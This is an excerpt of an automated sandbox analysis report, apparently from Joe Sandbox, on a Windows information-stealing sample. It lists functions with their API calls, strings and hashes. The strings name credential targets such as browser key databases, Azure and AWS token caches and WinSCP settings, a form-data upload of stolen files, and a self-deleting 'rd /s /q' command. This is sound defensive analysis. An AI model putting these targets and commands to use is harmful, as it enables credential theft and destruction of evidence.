                                                                                                                                                                                                                                                                                            Function 0040C009 Relevance: 1.5, APIs: 1, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32 ref: 0040C04B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 76bf32a98701eed808fdec152c3dcd3fa556dd761d2147bff69bd5c35468af49
                                                                                                                                                                                                                                                                                            • Instruction ID: f83c4e979e2241c40376acb44744fe4fe1f605f54e99aba1f5e8c3a0c1513ffb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76bf32a98701eed808fdec152c3dcd3fa556dd761d2147bff69bd5c35468af49
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69F06D719083068FC304DF28C984A16BBF1EFC9754F05CA5DE88897301E630D994CB96
                                                                                                                                                                                                                                                                                            Function 0042D98B Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0042D9B4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a27b26a9cc07503a5ffd4f9d8fd2edf3d2294b961f27338cad1e6b7784a11e9c
                                                                                                                                                                                                                                                                                            • Instruction ID: 06ca29c7c77cbb7dcb3cfc013ab395935eb095cd7e1a9a9979d4901d29d8eb17
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a27b26a9cc07503a5ffd4f9d8fd2edf3d2294b961f27338cad1e6b7784a11e9c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE092BB2042009BC310DF28DD91EA677E9EB86300F05456CA985C7251E670FC04C755
                                                                                                                                                                                                                                                                                            Function 00428DDA Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00428DF2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DriveLogicalStrings
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2022863570-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 113d1b87fdbe9d4d3ad158efa6e221a9b99e2fa62463c5cd1ef1ff41a886c9bb
                                                                                                                                                                                                                                                                                            • Instruction ID: f49399131d6cd1a0a0357cdb0235bfa083d093eafebc625f1058b8577526638d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 113d1b87fdbe9d4d3ad158efa6e221a9b99e2fa62463c5cd1ef1ff41a886c9bb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F039B9E012059FEB08CF54D891BD87BB1BB04300F24047DE606DB782DA3499488B80
                                                                                                                                                                                                                                                                                            Function 0040A09E Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00001000,00000000), ref: 0040A0BA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recv
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b6777f99fcc9ab9d3b0273c25965793aa14402d70d0dc89c73ee46f9b8689617
                                                                                                                                                                                                                                                                                            • Instruction ID: 22b8e15c2dc92d2d8ce7db97a0b63f0b975dcbef69a24b4e2dabaf85396e310b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6777f99fcc9ab9d3b0273c25965793aa14402d70d0dc89c73ee46f9b8689617
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81E01235340240EBE755D75CDD95F6133D5EB84344F4808387A16DB382EA74ED15C715
                                                                                                                                                                                                                                                                                            Function 0041F6B3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041F6D2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 074da7e7c8075810696abcef79b98451fad9a9472c3c4834b1dbe4cbc0ff9711
                                                                                                                                                                                                                                                                                            • Instruction ID: 328520a2f6c71d951bdf48b5bb8b27dd49798bebe312cf515b58bf2676e38ca3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 074da7e7c8075810696abcef79b98451fad9a9472c3c4834b1dbe4cbc0ff9711
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E08CBA70030097D7188B4ADC55F35B3E6ABE8704F18842DA906CB3E5D678EC048600
                                                                                                                                                                                                                                                                                            Function 00405B4B Relevance: 19.9, APIs: 4, Strings: 7, Instructions: 673memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 575 405b4b-40618a RtlAllocateHeap 681 40618e-406264 memcpy * 3 575->681
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00406179
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000000), ref: 004061AC
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 004061D7
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memcpy$AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID: "$------$Content-Disposition: form-data; name="$build_id$file_data$file_name$token
                                                                                                                                                                                                                                                                                            • API String ID: 4068229299-1375094155
                                                                                                                                                                                                                                                                                            • Opcode ID: ccfd5a6aefc9422aae94d8b475944c0a34b64018c2f12c8ae1d3fb1001b9740d
                                                                                                                                                                                                                                                                                            • Instruction ID: e566b6749127b83421f7d8bd2921eeafd4c76e6b7559269ba93b841b997abff9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccfd5a6aefc9422aae94d8b475944c0a34b64018c2f12c8ae1d3fb1001b9740d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B2231B93024106FCB45DB9DDC91AAEB3EAAFDA208308403DE019D3362DB749E159B5D
                                                                                                                                                                                                                                                                                            Function 0042AE60 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-3645552435
                                                                                                                                                                                                                                                                                            • Opcode ID: a7a371ecf0f8076029e4cc7b57d98caedca736390b6fe0b7d350fb9b107a7fc3
                                                                                                                                                                                                                                                                                            • Instruction ID: 0a88e78158d51e52cee96e28e865b3ad23bc5ccfa02deae9633e4b981ae8c292
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7a371ecf0f8076029e4cc7b57d98caedca736390b6fe0b7d350fb9b107a7fc3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7691B6BAB101005FC704DFACDC92A6A37E9FB89745B040539F919D3312D774EA18CB99
                                                                                                                                                                                                                                                                                            Function 0042D6FE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 725 42d6fe-42d897 ShellExecuteExA memset ExitProcess 742 42d89b-42d8c0 725->742
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                                                                                                                                            • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\$C:\Windows\system32\cmd.exe$open
                                                                                                                                                                                                                                                                                            • API String ID: 1852908831-1940193709
                                                                                                                                                                                                                                                                                            • Opcode ID: 95da33e724ad7f7f1facfc5f5cbbdf1cb13fd9b5e6c9d2578defee88dc884ed4
                                                                                                                                                                                                                                                                                            • Instruction ID: 098bc2924f9ee01437336e5800c6ce94c3868001c570cf6b015aab2e16dea32b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95da33e724ad7f7f1facfc5f5cbbdf1cb13fd9b5e6c9d2578defee88dc884ed4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E418F76B006049BC700DF9EDC81AA973E5BFD9709B544139E818C3322DBB8EA5D8B5D
                                                                                                                                                                                                                                                                                            Function 0042D651 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 806 42d651-42d8c0 ShellExecuteExA memset ExitProcess
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                                                                                                                                            • String ID: " & exit$C:\Windows\system32\cmd.exe$open
                                                                                                                                                                                                                                                                                            • API String ID: 1852908831-1505117684
                                                                                                                                                                                                                                                                                            • Opcode ID: f39581be4dbb3ba82523aaef3800270a0935aa1f83886992f7c7e9bff6325244
                                                                                                                                                                                                                                                                                            • Instruction ID: e551c106cc49a58ed8e142b4f9164b15046ded37baae1d2c715c840eb547d2f3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f39581be4dbb3ba82523aaef3800270a0935aa1f83886992f7c7e9bff6325244
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6519E76B006048BC304DF9EDC81AAE73E5AFDA6067584139E815C3322DBB8EE5D875D
                                                                                                                                                                                                                                                                                            Function 00409E2C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 186networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 832 409e2c-40a062 send
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0040A046
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: send
                                                                                                                                                                                                                                                                                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $u'E
                                                                                                                                                                                                                                                                                            • API String ID: 2809346765-1937848619
                                                                                                                                                                                                                                                                                            • Opcode ID: 8a2df545890ebcd2ccde8c9d34e4fad38da15e8cd78b0d0eae1f2fea33df3467
                                                                                                                                                                                                                                                                                            • Instruction ID: f09d3922218363589a7554bb9a070cc817d1bc8e78065892c14d31b0da745550
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2df545890ebcd2ccde8c9d34e4fad38da15e8cd78b0d0eae1f2fea33df3467
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB516876644101AFC324CB5CECD5F9A73D9AFC6214F0C4538E41AC3351E6B8AE28C75A
                                                                                                                                                                                                                                                                                            Function 0040E827 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 176fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 857 40e827-40e9fb CopyFileA 883 40e9fd call 40bc40 857->883 884 40e9fd call 40bd53 857->884 885 40e9fd call 40bd06 857->885 882 40e9ff-40ea1d 883->882 884->882 885->882
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040E9D2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\$\key4.db$lTD$lTD$'E
                                                                                                                                                                                                                                                                                            • API String ID: 1304948518-2578410745
                                                                                                                                                                                                                                                                                            • Opcode ID: 8d79dbb0ad1e7ac8fa06e4d058e647d1ef10b1d8f58137d4c59b0f9ceb188360
                                                                                                                                                                                                                                                                                            • Instruction ID: 6ad7053288e18fb2becd3ba35519820a6c95b5cb6f0518f62bf394652a1526bb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d79dbb0ad1e7ac8fa06e4d058e647d1ef10b1d8f58137d4c59b0f9ceb188360
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79517EB67401149FC704CB9CDDC1FAD33BAEFC9604B084428E406E7356DA78AE25CB9A
                                                                                                                                                                                                                                                                                            Function 00414223 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 886 414223-4142df memset * 4 RegOpenKeyExA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041423F
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00414258
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00414269
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041427A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 004142C2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$Open
                                                                                                                                                                                                                                                                                            • String ID: Software\Martin Prikryl\WinSCP 2\Configuration
                                                                                                                                                                                                                                                                                            • API String ID: 276825008-2822339690
                                                                                                                                                                                                                                                                                            • Opcode ID: 875ea9aeca57663236e07e7b8b738bcf569ddb3b5275693e73b7244f09e5574d
                                                                                                                                                                                                                                                                                            • Instruction ID: a4149cbd55dcf9ec5f86b160d7cd1004748f282e2d089feb1e299a34521fe547
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875ea9aeca57663236e07e7b8b738bcf569ddb3b5275693e73b7244f09e5574d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B11B2B2C511246BD720DBA6DC8DD9B3B7CEB8A310F04407EB519DB240E6B59914CBE5
                                                                                                                                                                                                                                                                                            Function 00428787 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129fileCOMMON
